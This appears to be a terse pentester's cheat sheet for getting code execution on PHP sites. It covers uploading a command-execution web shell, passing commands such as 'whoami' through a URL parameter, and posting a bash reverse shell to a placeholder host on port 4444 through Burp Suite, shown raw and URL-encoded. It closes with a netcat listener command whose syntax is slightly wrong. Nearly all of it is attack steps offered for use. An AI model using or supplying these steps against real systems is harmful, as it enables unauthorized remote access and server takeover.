PHP
Upload php code exec script
- File.php =
- In url
- http://x.x.x.x/File.php?msx=whoami
https://www.acunetix.com/websitesecurity/php-security-2/
PHP shell
in url go to shell.php?command=whoami
In Burpsuite create post request
POST /url/shell.php HTTP/1.1 content command=bash -c ‘bash -i >& /dev/tcp/x.x.x.x/4444 0>&1′
URL encode it to command=bash+-c+’bash+-i+>%26+/dev/tcp/x.x.x.x/4444+0>%261’
Setup NC to listen for incoming connections nc -lvnp x.x.x.x 4444
RootSecurity 